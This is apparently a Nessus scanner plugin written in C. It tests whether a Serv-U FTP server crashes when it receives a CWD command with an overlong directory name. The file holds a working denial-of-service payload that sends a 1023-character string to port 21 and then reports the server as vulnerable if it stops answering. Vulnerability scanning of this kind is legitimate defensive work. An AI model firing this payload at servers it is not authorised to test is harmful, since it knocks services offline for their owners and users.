#include <config.h>
#include <nessus-devel.h>
#include <nessuslib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>   
#define NAME "Serv-U CWD denial of service"
#define DESC "This plugin attempts to crash a remote Serv-U FTP server by \
issuing a CWD command with a long dir name"
#define COPYRIGHT "no copyright"
#define SUMM "crashes a remote Serv-U FTP server"





int plugin_init(struct arglist *desc);
int plugin_init(struct arglist *desc)
{
	plug_set_name(desc, NAME);
	plug_set_description(desc, DESC);
	plug_set_summary(desc, SUMM);
	plug_set_copyright(desc, COPYRIGHT);
	plug_set_category(desc, ACT_DENIAL);
	plug_set_family(desc, "Denial of Service");
	return(0);
}
	

int plugin_run(struct arglist * args);	
int plugin_run(struct arglist * args)
{
	int soc;
	char * buf;
	char * long_buf;
	
	
	if(host_get_port_state(args, 21)<=0)return(0);
	soc = open_sock_tcp(args, 21);
	if(soc<0)return(-1);
	long_buf = emalloc(1024);
	memset(long_buf, 'X', 1023);
	buf = emalloc(2048);
	sprintf(buf, "USER ftp\n");
	send(soc, buf, strlen(buf),0);
	recv(soc, buf, 4, 0);
	recv(soc, buf+4, 1024,0);
	
	sprintf(buf, "USER joe@\n");
	send(soc, buf, strlen(buf),0);
	recv(soc, buf, 4, 0);
	recv(soc, buf+4, 1024,0);
	
	sprintf(buf, "CWD %s\n", long_buf);
	efree(long_buf);
	send(soc, buf, strlen(buf),0);
	efree(buf);
	close(soc);
	if((soc = open_sock_tcp(args, 21))<0)
	{
	 post_hole(args, 21, 
"The remote FTP server could be crashed using the Serv-U
denial of service attack.
Solution : upgrade");
	}
        else close(soc);
	return(0);
}

